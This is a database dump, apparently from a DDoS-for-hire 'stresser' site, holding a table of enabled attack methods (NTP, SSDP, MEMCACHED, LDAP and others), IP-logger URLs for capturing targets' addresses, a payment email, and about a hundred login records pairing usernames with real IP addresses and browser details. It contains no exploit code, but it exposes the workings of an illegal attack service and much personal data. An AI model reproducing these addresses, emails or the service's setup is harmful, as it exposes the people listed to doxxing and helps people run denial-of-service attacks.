· 6 years ago · Oct 06, 2019, 02:00 AM
1-- phpMyAdmin SQL Dump
2-- version 4.2.12deb2+deb8u6
3-- http://www.phpmyadmin.net
4--
5-- Host: localhost
6-- Generation Time: Sep 23, 2019 at 06:40 PM
7-- Server version: 5.5.62-0+deb8u1
8-- PHP Version: 5.6.40-0+deb8u5
9
10SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
11SET time_zone = "+00:00";
12
13
14/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
15/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
16/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
17/*!40101 SET NAMES utf8 */;
18
19--
20-- Database: `ddoss`
21--
22
23-- --------------------------------------------------------
24
25--
26-- Table structure for table `blacklist`
27--
28
29CREATE TABLE IF NOT EXISTS `blacklist` (
30`ID` int(11) NOT NULL,
31 `IP` varchar(269) NOT NULL,
32 `note` text NOT NULL
33) ENGINE=MyISAM DEFAULT CHARSET=latin1;
34
35-- --------------------------------------------------------
36
37--
38-- Table structure for table `boot_methods`
39--
40
41CREATE TABLE IF NOT EXISTS `boot_methods` (
42 `method` varchar(32) NOT NULL,
43 `friendly_name` varchar(32) NOT NULL,
44 `active` enum('0','1') NOT NULL DEFAULT '1'
45) ENGINE=MyISAM DEFAULT CHARSET=latin1;
46
47--
48-- Dumping data for table `boot_methods`
49--
50
51INSERT INTO `boot_methods` (`method`, `friendly_name`, `active`) VALUES
52('ZAP', 'ZAP', '1'),
53('DNS', 'DNS', '1'),
54('BLUESYN', 'BLUESYN', '1'),
55('XMAS', 'XMAS', '1'),
56('SUDP', 'SUDP', '1'),
57('TILERA', 'TILERA', '1'),
58('OVH', 'OVH', '1'),
59('VSE', 'VSE', '1'),
60('REDSYN', 'REDSYN', '1'),
61('PROWIN', 'PROWIN', '1'),
62('WINSYN', 'WINSYN', '1'),
63('LDAP', 'LDAP', '1'),
64('SSDP', 'SSDP', '1'),
65('ACK', 'ACK', '1'),
66('WIZARD', 'WIZARD', '1'),
67('VOX', 'VOX', '1'),
68('PPTP', 'PPTP', '1'),
69('UBNT', 'UBNT', '1'),
70('TELNET', 'TELNET', '1'),
71('MAC', 'MAC', '1'),
72('MEMCACHED', 'MEMCACHED', '1'),
73('NTP', 'NTP', '1'),
74('DOMINATE', 'DOMINATE', '1'),
75('BO4BYPASS', 'BO4BYPASS', '1'),
76('FAST', 'FAST', '1'),
77('GREENSYN', 'GREENSYN', '1'),
78('BLAZIN', 'BLAZIN', '1'),
79('URG', 'URG', '1');
80
81-- --------------------------------------------------------
82
83--
84-- Table structure for table `fe`
85--
86
87CREATE TABLE IF NOT EXISTS `fe` (
88`ID` int(11) NOT NULL,
89 `userID` int(11) NOT NULL,
90 `type` varchar(1) NOT NULL,
91 `ip` varchar(15) NOT NULL,
92 `note` text NOT NULL
93) ENGINE=MyISAM DEFAULT CHARSET=latin1;
94
95-- --------------------------------------------------------
96
97--
98-- Table structure for table `gateway`
99--
100
101CREATE TABLE IF NOT EXISTS `gateway` (
102 `email` varchar(1024) NOT NULL
103) ENGINE=MyISAM DEFAULT CHARSET=latin1;
104
105--
106-- Dumping data for table `gateway`
107--
108
109INSERT INTO `gateway` (`email`) VALUES
110('breezy7984@gmail.com');
111
112-- --------------------------------------------------------
113
114--
115-- Table structure for table `iplogs`
116--
117
118CREATE TABLE IF NOT EXISTS `iplogs` (
119`ID` int(11) NOT NULL,
120 `userID` int(11) NOT NULL,
121 `logged` varchar(15) NOT NULL,
122 `date` int(11) NOT NULL
123) ENGINE=MyISAM DEFAULT CHARSET=latin1;
124
125-- --------------------------------------------------------
126
127--
128-- Table structure for table `loggers`
129--
130
131CREATE TABLE IF NOT EXISTS `loggers` (
132`logger_id` int(11) NOT NULL,
133 `address` varchar(256) NOT NULL
134) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=latin1;
135
136--
137-- Dumping data for table `loggers`
138--
139
140INSERT INTO `loggers` (`logger_id`, `address`) VALUES
141(2, 'https://txtgstresser.com/download.php?id=%'),
142(3, 'https://txtgstresser.com/image.php?id=%'),
143(1, 'https://txtgstresser.com/logger.php?id=%'),
144(4, 'https://txtgstresser.com/song.php?id=%'),
145(5, 'https://txtgstresser.com/video.php?id=%');
146
147-- --------------------------------------------------------
148
149--
150-- Table structure for table `loggers_ips`
151--
152
153CREATE TABLE IF NOT EXISTS `loggers_ips` (
154`id` int(11) NOT NULL,
155 `logger_id` int(11) NOT NULL,
156 `ip` varchar(128) NOT NULL,
157 `date` int(16) NOT NULL
158) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
159
160--
161-- Dumping data for table `loggers_ips`
162--
163
164INSERT INTO `loggers_ips` (`id`, `logger_id`, `ip`, `date`) VALUES
165(1, 1, '46.105.37.199', 1569034274),
166(2, 1, '2601:240:cf00:1499:f981:f848:dd8e:bdac', 1569142987);
167
168-- --------------------------------------------------------
169
170--
171-- Table structure for table `login_history`
172--
173
174CREATE TABLE IF NOT EXISTS `login_history` (
175`id` int(11) NOT NULL,
176 `username` varchar(75) NOT NULL,
177 `ip` varchar(128) NOT NULL,
178 `date` int(16) NOT NULL,
179 `http_agent` varchar(512) DEFAULT NULL
180) ENGINE=InnoDB AUTO_INCREMENT=119 DEFAULT CHARSET=latin1;
181
182--
183-- Dumping data for table `login_history`
184--
185
186INSERT INTO `login_history` (`id`, `username`, `ip`, `date`, `http_agent`) VALUES
187(7, 'txtgleader', '46.105.37.199', 1569031015, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
188(8, 'txtgleader', '46.105.37.199', 1569031367, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
189(9, 'undoxity', '145.239.212.33', 1569031716, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
190(10, 'undoxity', '145.239.212.33', 1569032045, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
191(11, 'TXTGNotLackin', '73.166.210.216', 1569032587, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
192(12, 'deonteworthen', '46.105.37.199', 1569032723, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
193(13, 'TXTGNotLackin', '73.166.210.216', 1569032732, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
194(14, 'deonteworthen', '46.105.37.199', 1569032752, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
195(15, 'DROPPEDWIFI25', '166.182.251.32', 1569032763, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
196(16, 'undoxity', '145.239.212.33', 1569032794, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
197(17, 'undoxitytest', '145.239.212.33', 1569032824, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
198(18, 'DROPPEDWIFI25', '166.182.251.32', 1569033095, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
199(19, 'undoxitytest', '145.239.212.33', 1569033218, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
200(20, 'undoxitytest', '145.239.212.33', 1569033274, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
201(21, 'undoxity', '145.239.212.33', 1569033370, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
202(22, 'Anonymous123', '185.245.86.52', 1569033784, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
203(23, 'harmz', '2600:1700:5510:cb90:6ddc:84f1:343f:4410', 1569034669, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
204(24, 'txtgleader', '46.105.37.199', 1569035899, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
205(25, 'txtgleader', '2607:fcc8:e080:bb00:84dd:d26:d530:eab7', 1569038818, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
206(26, 'DROPPEDWIFI25', '166.182.251.32', 1569042039, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
207(27, 'Ultraferrox', '2601:188:8280:1300:cc81:8250:6bcf:4578', 1569043887, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1'),
208(28, 'Chubu', '2600:387:2:803::92', 1569045098, 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),
209(29, 'deonteworthen', '46.105.37.199', 1569045568, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
210(30, 'undoxity', '145.239.212.33', 1569047720, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
211(31, 'iamtesting', '5.67.35.33', 1569053049, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
212(32, 'iamtesting', '5.67.35.33', 1569053072, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
213(33, 'iamtesting', '5.67.35.33', 1569056002, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
214(34, 'iamtesting', '5.67.35.33', 1569060484, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
215(35, 'iamtesting', '5.67.35.33', 1569066493, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
216(36, 'txtgleader', '2607:fcc8:e080:bb00:c02b:537c:69cc:3007', 1569078895, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
217(37, 'iamtesting', '217.146.82.127', 1569079502, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
218(38, 'InsanityBoii', '51.89.176.228', 1569079613, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
219(39, 'iamtesting', '217.146.82.127', 1569082377, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),
220(40, 'CaronModzAll', '104.143.200.78', 1569084069, 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),
221(41, 'deonteworthen', '108.73.111.98', 1569084711, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
222(42, 'txtgleader', '54.36.24.157', 1569099101, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
223(43, 'TxtgH3ADSHOT', '2600:6c56:7d00:278:55b8:a792:d844:f854', 1569099916, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1'),
224(44, 'undoxitytest', '145.239.212.33', 1569101284, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
225(45, 'undoxity', '145.239.212.33', 1569101293, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
226(46, 'deonteworthen', '108.73.111.98', 1569103269, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
227(47, 'undoxity', '145.239.212.33', 1569104288, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
228(48, 'txtgleader', '2607:fcc8:e080:bb00:c02b:537c:69cc:3007', 1569105557, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
229(49, 'TxtgH3ADSHOT', '2607:fb90:449a:dcdb:4922:780c:9eca:2f6d', 1569111197, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1'),
230(50, 'DROPPEDWIFI25', '166.182.249.118', 1569111746, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
231(51, 'Davezn6', '2600:1702:6e0:2650:c6f:ae6c:eed6:9e97', 1569112782, 'Mozilla/5.0 (Linux; Android 9; moto g(7) power) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
232(52, 'txtgleader', '54.36.24.157', 1569112830, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
233(53, 'txtgH3ADSHOT', '2600:6c56:7d00:278:1d4a:a793:12d5:48a4', 1569114255, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763'),
234(54, 'CaronModzAll', '66.171.38.156', 1569114311, 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),
235(55, 'deonteworthen', '108.73.111.98', 1569117521, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
236(56, 'DROPPEDWIFI25', '166.182.249.118', 1569119174, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
237(57, 'treyyoung', '54.36.24.157', 1569119436, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
238(58, 'txtgleader', '54.36.24.157', 1569119494, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
239(59, 'Txtgqueen', '2600:387:0:809::83', 1569120478, 'Mozilla/5.0 (Linux; Android 9; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
240(60, 'txtgleader', '54.36.24.157', 1569123958, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
241(61, 'treyyoung', '54.36.24.157', 1569125170, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
242(62, 'TxtgH3ADSHOT', '2607:fb90:449a:dcdb:4922:780c:9eca:2f6d', 1569125854, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1'),
243(63, 'deonteworthen', '46.105.37.199', 1569128374, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
244(64, 'txtgleader', '54.36.24.157', 1569133381, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
245(65, 'undoxitytest', '145.239.212.33', 1569133418, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
246(66, 'deonteworthen', '46.105.37.199', 1569133428, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
247(67, 'undoxity', '145.239.212.33', 1569133429, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3918.0 Safari/537.36'),
248(68, 'deonteworthen', '107.242.117.64', 1569140863, 'Mozilla/5.0 (Linux; Android 7.0; LG-M430) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36'),
249(69, 'Frosty', '54.36.24.157', 1569163598, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763'),
250(70, 'txtgleader', '46.105.37.199', 1569164598, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
251(71, 'txtgleader', '46.105.37.199', 1569166568, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
252(72, 'txtgleader', '46.105.37.199', 1569169545, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
253(73, 'deonteworthen', '108.73.111.98', 1569171418, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
254(74, 'DROPPEDWIFI25', '50.25.150.90', 1569182567, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
255(75, 'DROPPEDWIFI25', '50.25.150.90', 1569184041, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
256(76, 'txtgleader', '46.105.37.199', 1569185059, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
257(77, 'Frosty', '54.36.24.157', 1569189921, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763'),
258(78, 'txtgleader', '2607:fcc8:e080:bb00:8910:e1b1:6021:d200', 1569191193, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
259(79, 'Frosty', '54.36.24.157', 1569197213, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763'),
260(80, 'txtgleader', '2607:fcc8:e080:bb00:6d9e:d9eb:614f:528e', 1569197394, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
261(81, 'deonteworthen', '46.105.37.199', 1569197850, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
262(82, 'txtgleader', '2607:fcc8:e080:bb00:6d9e:d9eb:614f:528e', 1569198587, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
263(83, 'V2680', '137.74.233.212', 1569199797, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
264(84, 'Turn', '2a04:b2c2:1002:2f00:fd05:e1af:b1d9:aba3', 1569200225, 'Mozilla/5.0 (Linux; Android 9; SM-G950F Build/PPR1.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/77.0.3865.92 Mobile Safari/537.36 Instagram 111.1.0.25.152 Android (28/9; 480dpi; 1080x2076; samsung; SM-G950F; dreamlte; samsungexynos8895; en_GB; 173238731)'),
265(85, 'V2680', '137.74.233.212', 1569200290, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
266(86, 'treyyoung', '54.36.24.156', 1569203594, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
267(87, 'txtgleader', '2607:fcc8:e080:bb00:6d9e:d9eb:614f:528e', 1569204672, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
268(88, 'ShalXBL', '69.125.125.67', 1569204838, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 OPR/63.0.3368.88'),
269(89, 'deonteworthen', '108.73.111.98', 1569205058, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
270(90, 'Diamondshot', '2806:1000:8000:9875:c8d7:5a90:dc9f:1190', 1569207448, 'Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G930A) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36'),
271(91, 'treyyoung', '54.36.24.156', 1569208958, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
272(92, 'Vivian', '45.248.77.68', 1569210238, 'Mozilla/5.0 (Linux; Android 6.0.1; H715BL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
273(93, 'treyyoung', '54.36.24.156', 1569211150, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
274(94, 'txtgleader', '2607:fcc8:e080:bb00:6d9e:d9eb:614f:528e', 1569213025, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
275(95, 'Stadics', '24.205.187.219', 1569213785, 'Mozilla/5.0 (Linux; Android 8.1.0; SM-J727P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.73 Mobile Safari/537.36'),
276(96, 'treyyoung', '54.36.24.156', 1569215647, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
277(97, 'txtgleader', '2607:fcc8:e080:bb00:6d9e:d9eb:614f:528e', 1569215945, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
278(98, 'DROPPEDWIFI25', '166.182.252.41', 1569216342, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
279(99, 'DROPPEDWIFI25', '166.182.252.41', 1569217271, 'Mozilla/5.0 (Linux; Android 8.1.0; LM-Q710.FG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'),
280(100, 'CaronModzAll', '66.171.38.156', 1569218300, 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),
281(101, 'TXTGNotLackin', '192.241.216.124', 1569245866, 'Mozilla/5.0 (Linux; Android 7.1.2; LM-X210VPP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.73 Mobile Safari/537.36'),
282(102, 'txtgleader', '147.135.3.157', 1569249779, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
283(103, 'acaudill7', '104.230.200.9', 1569251181, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
284(104, 'loler44', '208.74.240.146', 1569251229, 'Mozilla/5.0 (X11; CrOS armv7l 12105.100.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.144 Safari/537.36'),
285(105, 'loler44', '208.74.240.146', 1569251300, 'Mozilla/5.0 (X11; CrOS armv7l 12105.100.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.144 Safari/537.36'),
286(106, 'tylerj101998', '108.254.47.244', 1569253098, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),
287(107, 'zxntrix', '91.134.250.85', 1569253262, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
288(108, 'BluesBros0511', '2606:a000:111e:e041:5c1:25f8:c3fe:2d5b', 1569253361, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1'),
289(109, 'Uk720', '217.146.82.3', 1569253380, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
290(110, 'Uk720', '217.146.82.3', 1569253476, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
291(111, 'Uk720', '217.146.82.3', 1569253601, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),
292(112, 'txtgleader', '147.135.3.157', 1569255582, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
293(113, 'acaudill7', '104.230.200.9', 1569255936, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
